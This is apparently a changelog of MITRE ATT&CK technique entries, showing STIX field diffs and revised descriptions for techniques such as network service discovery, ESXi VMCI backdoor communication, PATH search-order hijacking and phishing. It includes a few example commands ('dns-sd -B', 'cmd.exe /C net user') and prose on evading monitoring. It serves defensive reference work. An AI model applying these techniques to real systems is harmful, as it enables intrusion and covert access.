| x_mitre_platforms[0] | Network | Network Devices |
[T1602.002] Data from Configuration Repository: Network Device Configuration Dump
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-02-17 19:50:46.948000+00:00 | 2025-04-15 19:58:31.045000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1046] Network Service Discovery
Current version: 3.2
Version changed from: 3.1 → 3.2
|
|
|---|
| t | Adversaries may attempt to get a listing of services running | t | Adversaries may attempt to get a listing of services running |
| on remote hosts and local network infrastructure devices, i | | on remote hosts and local network infrastructure devices, i |
| ncluding those that may be vulnerable to remote software exp | | ncluding those that may be vulnerable to remote software exp |
| loitation. Common methods to acquire this information includ | | loitation. Common methods to acquire this information includ |
| e port and/or vulnerability scans using tools that are broug | | e port, vulnerability, and/or wordlist scans using tools tha |
| ht onto a system.(Citation: CISA AR21-126A FIVEHANDS May 202 | | t are brought onto a system.(Citation: CISA AR21-126A FIVEHA |
| 1) Within cloud environments, adversaries may attempt to | | NDS May 2021) Within cloud environments, adversaries may |
| discover services running on other cloud hosts. Additionall | | attempt to discover services running on other cloud hosts. |
| y, if the cloud environment is connected to a on-premises en | | Additionally, if the cloud environment is connected to a on- |
| vironment, adversaries may be able to identify services runn | | premises environment, adversaries may be able to identify se |
| ing on non-cloud systems as well. Within macOS environments | | rvices running on non-cloud systems as well. Within macOS e |
| , adversaries may use the native Bonjour application to disc | | nvironments, adversaries may use the native Bonjour applicat |
| over services running on other macOS hosts within a network. | | ion to discover services running on other macOS hosts within |
| The Bonjour mDNSResponder daemon automatically registers an | | a network. The Bonjour mDNSResponder daemon automatically r |
| d advertises a host’s registered services on the network. Fo | | egisters and advertises a host’s registered services on the |
| r example, adversaries can use a mDNS query (such as <code>d | | network. For example, adversaries can use a mDNS query (such |
| ns-sd -B _ssh._tcp .</code>) to find other systems broadcast | | as <code>dns-sd -B _ssh._tcp .</code>) to find other system |
| ing the ssh service.(Citation: apple doco bonjour descriptio | | s broadcasting the ssh service.(Citation: apple doco bonjour |
| n)(Citation: macOS APT Activity Bradley) | | description)(Citation: macOS APT Activity Bradley) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-11 21:10:09.547000+00:00 | 2025-04-15 19:59:15.945000+00:00 |
| description | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 3.1 | 3.2 |
| x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | Aaron Sullivan aka ZerkerEOD |
[T1070.005] Indicator Removal: Network Share Connection Removal
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis'] | |
| x_mitre_system_requirements | ['Established network share connection to a remote system. Level of access depends on permissions of the account used.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-13 17:15:56.948000+00:00 | 2025-04-16 20:37:18.727000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1040] Network Sniffing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Network interface access and packet capture driver'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:11:55.217000+00:00 | 2025-04-15 19:58:19.739000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1095] Non-Application Layer Protocol
Current version: 2.4
Version changed from: 2.3 → 2.4
|
|
|---|
| t | Adversaries may use an OSI non-application layer protocol fo | t | Adversaries may use an OSI non-application layer protocol fo |
| r communication between host and C2 server or among infected | | r communication between host and C2 server or among infected |
| hosts within a network. The list of possible protocols is e | | hosts within a network. The list of possible protocols is e |
| xtensive.(Citation: Wikipedia OSI) Specific examples include | | xtensive.(Citation: Wikipedia OSI) Specific examples include |
| use of network layer protocols, such as the Internet Contro | | use of network layer protocols, such as the Internet Contro |
| l Message Protocol (ICMP), transport layer protocols, such a | | l Message Protocol (ICMP), transport layer protocols, such a |
| s the User Datagram Protocol (UDP), session layer protocols, | | s the User Datagram Protocol (UDP), session layer protocols, |
| such as Socket Secure (SOCKS), as well as redirected/tunnel | | such as Socket Secure (SOCKS), as well as redirected/tunnel |
| ed protocols, such as Serial over LAN (SOL). ICMP communica | | ed protocols, such as Serial over LAN (SOL). ICMP communica |
| tion between hosts is one example.(Citation: Cisco Synful Kn | | tion between hosts is one example.(Citation: Cisco Synful Kn |
| ock Evolution) Because ICMP is part of the Internet Protocol | | ock Evolution) Because ICMP is part of the Internet Protocol |
| Suite, it is required to be implemented by all IP-compatibl | | Suite, it is required to be implemented by all IP-compatibl |
| e hosts.(Citation: Microsoft ICMP) However, it is not as com | | e hosts.(Citation: Microsoft ICMP) However, it is not as com |
| monly monitored as other Internet Protocols such as TCP or U | | monly monitored as other Internet Protocols such as TCP or U |
| DP and may be used by adversaries to hide communications. | | DP and may be used by adversaries to hide communications. I |
| | | n ESXi environments, adversaries may leverage the Virtual Ma |
| | | chine Communication Interface (VMCI) for communication betwe |
| | | en guest virtual machines and the ESXi host. This traffic is |
| | | similar to client-server communications on traditional netw |
| | | ork sockets but is localized to the physical machine running |
| | | the ESXi host, meaning it does not traverse external networ |
| | | ks (routers, switches). This results in communications that |
| | | are invisible to external monitoring and standard networking |
| | | tools like tcpdump, netstat, nmap, and Wireshark. By adding |
| | | a VMCI backdoor to a compromised ESXi host, adversaries may |
| | | persistently regain access from any guest VM to the comprom |
| | | ised ESXi host’s backdoor, regardless of network segmentatio |
| | | n or firewall rules in place.(Citation: Google Cloud Threat |
| | | Intelligence VMWare ESXi Zero-Day 2023) |
New Mitigations:
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-29 21:07:31.570000+00:00 | 2025-04-15 19:59:04.779000+00:00 |
| description | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
In ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host’s backdoor, regardless of network segmentation or firewall rules in place.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023) |
| x_mitre_version | 2.3 | 2.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023', 'description': 'Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/'} |
| x_mitre_platforms | | ESXi |
[T1132.002] Data Encoding: Non-Standard Encoding
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-14 23:39:50.117000+00:00 | 2025-04-15 19:59:11.823000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1571] Non-Standard Port
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:37:57.868000+00:00 | 2025-04-15 19:58:58.463000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027] Obfuscated Files or Information
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host Forensic Analysis', 'Signature-based Detection', 'Host Intrusion Prevention Systems', 'Application Control', 'Log Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:27:18.945000+00:00 | 2025-04-15 19:58:59.251000+00:00 |
| external_references[4]['description'] | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf | https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1218.008] System Binary Proxy Execution: Odbcconf
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 18:52:49.877000+00:00 | 2025-04-15 19:58:39.912000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1102.003] Web Service: One-Way Communication
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 23:26:10.109000+00:00 | 2025-04-15 19:58:53.389000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1134.004] Access Token Manipulation: Parent PID Spoofing
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Heuristic Detection', 'Host Forensic Analysis'] | |
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-03 02:15:42.360000+00:00 | 2025-04-16 20:37:18.203000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1550.002] Use Alternate Authentication Material: Pass the Hash
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-28 18:24:16.246000+00:00 | 2025-04-16 20:37:22.508000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1550.003] Use Alternate Authentication Material: Pass the Ticket
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System Access Controls'] | |
| x_mitre_system_requirements | ['Kerberos authentication enabled'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:21:09.330000+00:00 | 2025-04-15 19:58:43.927000+00:00 |
| external_references[2]['description'] | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved November 17, 2024. |
| external_references[2]['url'] | http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf | https://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf |
| x_mitre_version | 1.1 | 1.2 |
[T1110.002] Brute Force: Password Cracking
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:11.912000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1110.001] Brute Force: Password Guessing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:04.272000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1201] Password Policy Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:02:44.477000+00:00 | 2025-04-15 19:59:00.168000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[4] | Network | Network Devices |
[T1110.003] Brute Force: Password Spraying
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:38.420000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1601.001] Modify System Image: Patch System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 17:50:46.560000+00:00 | 2025-04-15 19:59:10.610000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-03 03:29:57.078000+00:00 | 2025-04-15 19:58:05.096000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1574.008] Hijack Execution Flow: Path Interception by Search Order Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may execute their own malicious payloads by hija | t | Adversaries may execute their own malicious payloads by hija |
| cking the search order used to load other programs. Because | | cking the search order used to load other programs. Because |
| some programs do not call other programs using the full path | | some programs do not call other programs using the full path |
| , adversaries may place their own file in the directory wher | | , adversaries may place their own file in the directory wher |
| e the calling program is located, causing the operating syst | | e the calling program is located, causing the operating syst |
| em to launch their malicious software at the request of the | | em to launch their malicious software at the request of the |
| calling program. Search order hijacking occurs when an adve | | calling program. Search order hijacking occurs when an adve |
| rsary abuses the order in which Windows searches for program | | rsary abuses the order in which Windows searches for program |
| s that are not given a path. Unlike [DLL Search Order Hijack | | s that are not given a path. Unlike [DLL](https://attack.mit |
| ing](https://attack.mitre.org/techniques/T1574/001), the sea | | re.org/techniques/T1574/001) search order hijacking, the sea |
| rch order differs depending on the method that is used to ex | | rch order differs depending on the method that is used to ex |
| ecute the program. (Citation: Microsoft CreateProcess) (Cita | | ecute the program. (Citation: Microsoft CreateProcess) (Cita |
| tion: Windows NT Command Shell) (Citation: Microsoft WinExec | | tion: Windows NT Command Shell) (Citation: Microsoft WinExec |
| ) However, it is common for Windows to search in the directo | | ) However, it is common for Windows to search in the directo |
| ry of the initiating program before searching through the Wi | | ry of the initiating program before searching through the Wi |
| ndows system directory. An adversary who finds a program vul | | ndows system directory. An adversary who finds a program vul |
| nerable to search order hijacking (i.e., a program that does | | nerable to search order hijacking (i.e., a program that does |
| not specify the path to an executable) may take advantage o | | not specify the path to an executable) may take advantage o |
| f this vulnerability by creating a program named after the i | | f this vulnerability by creating a program named after the i |
| mproperly specified program and placing it within the initia | | mproperly specified program and placing it within the initia |
| ting program's directory. For example, "example.exe" runs " | | ting program's directory. For example, "example.exe" runs " |
| cmd.exe" with the command-line argument <code>net user</code | | cmd.exe" with the command-line argument <code>net user</code |
| >. An adversary may place a program called "net.exe" within | | >. An adversary may place a program called "net.exe" within |
| the same directory as example.exe, "net.exe" will be run ins | | the same directory as example.exe, "net.exe" will be run ins |
| tead of the Windows system utility net. In addition, if an a | | tead of the Windows system utility net. In addition, if an a |
| dversary places a program called "net.com" in the same direc | | dversary places a program called "net.com" in the same direc |
| tory as "net.exe", then <code>cmd.exe /C net user</code> wil | | tory as "net.exe", then <code>cmd.exe /C net user</code> wil |
| l execute "net.com" instead of "net.exe" due to the order of | | l execute "net.com" instead of "net.exe" due to the order of |
| executable extensions defined under PATHEXT. (Citation: Mic | | executable extensions defined under PATHEXT. (Citation: Mic |
| rosoft Environment Property) Search order hijacking is also | | rosoft Environment Property) Search order hijacking is also |
| a common practice for hijacking DLL loads and is covered in | | a common practice for hijacking DLL loads and is covered in |
| [DLL Search Order Hijacking](https://attack.mitre.org/techn | | [DLL](https://attack.mitre.org/techniques/T1574/001). |
| iques/T1574/001). | | |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['Administrator', 'SYSTEM', 'User'] | |
| x_mitre_permissions_required | ['Administrator', 'User', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:25:57.059000+00:00 | 2025-04-15 19:58:33.873000+00:00 |
| description | Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). | Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001). |
| x_mitre_version | 1.0 | 1.1 |
[T1120] Peripheral Device Discovery
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:41.575000+00:00 | 2025-04-16 20:37:16.397000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1566] Phishing
Current version: 2.7
Version changed from: 2.6 → 2.7
|
|
|---|
| t | Adversaries may send phishing messages to gain access to vic | t | Adversaries may send phishing messages to gain access to vic |
| tim systems. All forms of phishing are electronically delive | | tim systems. All forms of phishing are electronically delive |
| red social engineering. Phishing can be targeted, known as s | | red social engineering. Phishing can be targeted, known as s |
| pearphishing. In spearphishing, a specific individual, compa | | pearphishing. In spearphishing, a specific individual, compa |
| ny, or industry will be targeted by the adversary. More gene | | ny, or industry will be targeted by the adversary. More gene |
| rally, adversaries can conduct non-targeted phishing, such a | | rally, adversaries can conduct non-targeted phishing, such a |
| s in mass malware spam campaigns. Adversaries may send vict | | s in mass malware spam campaigns. Adversaries may send vict |
| ims emails containing malicious attachments or links, typica | | ims emails containing malicious attachments or links, typica |
| lly to execute malicious code on victim systems. Phishing ma | | lly to execute malicious code on victim systems. Phishing ma |
| y also be conducted via third-party services, like social me | | y also be conducted via third-party services, like social me |
| dia platforms. Phishing may also involve social engineering | | dia platforms. Phishing may also involve social engineering |
| techniques, such as posing as a trusted source, as well as e | | techniques, such as posing as a trusted source, as well as e |
| vasive techniques such as removing or manipulating emails or | | vasive techniques such as removing or manipulating emails or |
| metadata/headers from compromised accounts being abused to | | metadata/headers from compromised accounts being abused to |
| send messages (e.g., [Email Hiding Rules](https://attack.mit | | send messages (e.g., [Email Hiding Rules](https://attack.mit |
| re.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spa | | re.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spa |
| m 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) An | | m 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) An |
| other way to accomplish this is by forging or spoofing(Citat | | other way to accomplish this is by [Email Spoofing](https:// |
| ion: Proofpoint-spoof) the identity of the sender which can | | attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoo |
| be used to fool both the human recipient as well as automate | | f) the identity of the sender, which can be used to fool bot |
| d security tools,(Citation: cyberproof-double-bounce) or by | | h the human recipient as well as automated security tools,(C |
| including the intended target as a party to an existing emai | | itation: cyberproof-double-bounce) or by including the inten |
| l thread that includes malicious files or links (i.e., "thre | | ded target as a party to an existing email thread that inclu |
| ad hijacking").(Citation: phishing-krebs) Victims may also | | des malicious files or links (i.e., "thread hijacking").(Cit |
| receive phishing messages that instruct them to call a phone | | ation: phishing-krebs) Victims may also receive phishing me |
| number where they are directed to visit a malicious URL, do | | ssages that instruct them to call a phone number where they |
| wnload malware,(Citation: sygnia Luna Month)(Citation: CISA | | are directed to visit a malicious URL, download malware,(Cit |
| Remote Monitoring and Management Software) or install advers | | ation: sygnia Luna Month)(Citation: CISA Remote Monitoring a |
| ary-accessible remote management tools onto their computer ( | | nd Management Software) or install adversary-accessible remo |
| i.e., [User Execution](https://attack.mitre.org/techniques/T | | te management tools onto their computer (i.e., [User Executi |
| 1204)).(Citation: Unit42 Luna Moth) | | on](https://attack.mitre.org/techniques/T1204)).(Citation: U |
| | | nit42 Luna Moth) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-07 15:00:19.668000+00:00 | 2025-04-15 19:58:55.739000+00:00 |
| description | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
